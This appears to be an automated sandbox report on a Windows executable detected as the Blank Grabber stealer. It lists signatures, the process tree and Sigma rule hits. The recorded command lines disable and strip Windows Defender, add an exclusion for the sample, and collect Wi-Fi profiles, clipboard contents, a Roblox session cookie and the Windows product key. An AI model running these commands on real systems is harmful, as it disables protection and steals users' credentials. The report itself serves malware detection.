
Windows Analysis Report
e45AiBoV6X.exe

Overview

General Information

Sample name: e45AiBoV6X.exe
renamed because original name is a hash value
Original sample name: 3e6d7972822636f67ccf275ebd140188.exe
Analysis ID: 1477272
MD5: 3e6d7972822636f67ccf275ebd140188
SHA1: b0a6df78dad3b697458d9296df134900b4b33177
SHA256: 483a8ed2f54ab848a850e9b97207c3ed638ddd3e9fb01d19746f5d5b12e30525
Tags: 64exe

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Potentially malicious time measurement code found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Very long command line found
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • e45AiBoV6X.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\e45AiBoV6X.exe" MD5: 3E6D7972822636F67CCF275EBD140188)
    • e45AiBoV6X.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\e45AiBoV6X.exe" MD5: 3E6D7972822636F67CCF275EBD140188)
      • cmd.exe (PID: 7452 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7568 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7460 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7544 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7276 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7744 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7912 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7900 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6628 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8008 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6692 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 2504 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8164 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 6556 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7484 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7188 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5052 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 6688 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7780 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 7860 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1368 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 5052 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 6688 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA594.tmp" "c:\Users\user\AppData\Local\Temp\bohkan2x\CSC24344491B9A34B60B194FE692FA1E0E5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8096 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8032 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7976 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 2920 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8144 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 2696 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8124 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8184 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7724 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7640 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4500 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7888 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5568 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7188 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 8132 cmdline: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 6688 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7780 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7756 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7900 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3052 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7656 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7612 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 1432 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5592 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7200 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_MEI73802\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000002.1986903181.000002290AFF2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\e45AiBoV6X.exe", ParentImage: C:\Users\user\Desktop\e45AiBoV6X.exe, ParentProcessId: 7396, ParentProcessName: e45AiBoV6X.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'", ProcessId: 7452, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\e45AiBoV6X.exe", ParentImage: C:\Users\user\Desktop\e45AiBoV6X.exe, ParentProcessId: 7396, ParentProcessName: e45AiBoV6X.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7460, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\e45AiBoV6X.exe", ParentImage: C:\Users\user\Desktop\e45AiBoV6X.exe, ParentProcessId: 7396, ParentProcessName: e45AiBoV6X.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *", ProcessId: 7188, ProcessName: cmd.exe
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7780, StartAddress: 213032B0, TargetImage: C:\Windows\System32\systeminfo.exe, TargetProcessId: 7780
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\e45AiBoV6X.exe", ParentImage: C:\Users\user\Desktop\e45AiBoV6X.exe, ParentProcessId: 7396, ParentProcessName: e45AiBoV6X.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 8008, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\e45AiBoV6X.exe", ParentImage: C:\Users\user\Desktop\e45AiBoV6X.exe, ParentProcessId: 7396, ParentProcessName: e45AiBoV6X.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'", ProcessId: 7452, ProcessName: cmd.exe
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1368, TargetFilename: C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7188, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *, ProcessId: 8132, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7544, ProcessName: powershell.exe

              Data Obfuscation

              barindex
